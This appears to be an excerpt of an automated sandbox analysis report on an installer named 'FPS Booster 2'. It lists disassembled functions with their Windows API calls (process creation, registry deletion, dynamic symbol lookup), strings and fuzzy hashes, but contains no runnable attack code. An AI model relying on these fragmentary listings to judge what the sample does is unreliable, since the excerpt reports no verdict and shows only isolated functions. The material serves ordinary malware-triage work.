                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                • lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                • String ID:
                                                • API String ID: 2740478559-0
                                                • Opcode ID: 471e7f8fc2b920915949bdd7b41082774f496188afb4edabac252d6a905c9898
                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                • Opcode Fuzzy Hash: 471e7f8fc2b920915949bdd7b41082774f496188afb4edabac252d6a905c9898
                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                Strings
                                                • Exec: success ("%s"), xrefs: 00402263
                                                • Exec: command="%s", xrefs: 00402241
                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                • API String ID: 2014279497-3433828417
                                                • Opcode ID: 606aa0f624e16cfd08a3d3497b582caa03978367d61ff0107b1f05178c662554
                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                • Opcode Fuzzy Hash: 606aa0f624e16cfd08a3d3497b582caa03978367d61ff0107b1f05178c662554
                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                • GetMessagePos.USER32 ref: 0040489D
                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                • MulDiv.KERNEL32(000696B0,00000064,0006B7A0), ref: 00403295
                                                • wsprintfW.USER32 ref: 004032A5
                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                Strings
                                                • verifying installer: %d%%, xrefs: 0040329F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 6e71b36604eb8168b9de070626c23bed7d900371b4c5136878c27d07ffa20f21
                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                • Opcode Fuzzy Hash: 6e71b36604eb8168b9de070626c23bed7d900371b4c5136878c27d07ffa20f21
                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                Function 6FFB1021 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6FFB1E34: lstrcpynW.KERNEL32(?,?,6FFB1053,?,6FFB1053,?), ref: 6FFB1E62
                                                  • Part of subcall function 6FFB1E34: GlobalFree.KERNELBASE ref: 6FFB1E72
                                                • SHBrowseForFolderW.SHELL32(?), ref: 6FFB10B4
                                                  • Part of subcall function 6FFB1E83: GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                  • Part of subcall function 6FFB1E83: lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Globallstrcpyn$AllocBrowseFolderFree
                                                • String ID: E$error
                                                • API String ID: 1025582028-2359134700
                                                • Opcode ID: 1d37399892a915d26e0d4735e66ec77ab2fa821abcb7aa644d48759b5007fe64
                                                • Instruction ID: 13cd765273713341a9985b0dfae0d388887d20c4a970b005ae563ecf7c93fa41
                                                • Opcode Fuzzy Hash: 1d37399892a915d26e0d4735e66ec77ab2fa821abcb7aa644d48759b5007fe64
                                                • Instruction Fuzzy Hash: AB212C729152199BDB10DFA6C985BDE77B8AF08399F00415AE904E2240D734EB44CFA0
                                                Function 004020F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00402100
                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                • String ID: MS Shell Dlg
                                                • API String ID: 1599320355-76309092
                                                • Opcode ID: ccebd128bbe4e9bb6111c0dafa4c3d4753fa9787b5105a835a2bc2114a3fe238
                                                • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                • Opcode Fuzzy Hash: ccebd128bbe4e9bb6111c0dafa4c3d4753fa9787b5105a835a2bc2114a3fe238
                                                • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                Function 6E9E1904 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6E9E1581: GlobalAlloc.KERNELBASE(00000040,?,6E9E15BA,?,?,6E9E185F,?,6E9E1017), ref: 6E9E158B
                                                • lstrcpyW.KERNEL32(00000000,error,00000000,6E9E287B,00000000), ref: 6E9E1929
                                                • wsprintfW.USER32 ref: 6E9E1942
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AllocGloballstrcpywsprintf
                                                • String ID: callback%d$error$s<u
                                                • API String ID: 2689062267-3671815815
                                                • Opcode ID: 970e5fdafc2ced97c4ae6d78fce13d4c7ad9f3d8b551645bac1afe82fdb26859
                                                • Instruction ID: 039d57cdafe9b1bb67e42715ce27192640535700bd6dc8ac21e90efb6bb1e60c
                                                • Opcode Fuzzy Hash: 970e5fdafc2ced97c4ae6d78fce13d4c7ad9f3d8b551645bac1afe82fdb26859
                                                • Instruction Fuzzy Hash: C1E0D870608410AB4653D7FAF84C9A936786F833397000960F709D6A61C711C6498E86
                                                Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                Function 6E9E194F Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000808,6E9E22A8,?,00000808), ref: 6E9E1967
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000808,6E9E22A8,?,00000808), ref: 6E9E196E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000808,6E9E22A8,?,00000808), ref: 6E9E1982
                                                • GetProcAddress.KERNEL32(6E9E22A8,00000000), ref: 6E9E1989
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E1992
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 42efff23daa4338021e624cbf6f8eb9d5970b104514be558a6dc9643c80691a5
                                                • Instruction ID: 9c88982d752259a2bd5090ca92f05ceddeb3b7f762b08a375d188b302dfdea49
                                                • Opcode Fuzzy Hash: 42efff23daa4338021e624cbf6f8eb9d5970b104514be558a6dc9643c80691a5
                                                • Instruction Fuzzy Hash: 1DF0127210A534BBDA2056B78C4CCABFE9CDF4B2F6B110611F318911A086615D01DAF1
                                                Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                • wsprintfW.USER32 ref: 00404483
                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: fbcd40c561807554bf51775529ac3d7756d0fb4ab7b9da1cf7b6b1c34415f23c
                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                • Opcode Fuzzy Hash: fbcd40c561807554bf51775529ac3d7756d0fb4ab7b9da1cf7b6b1c34415f23c
                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
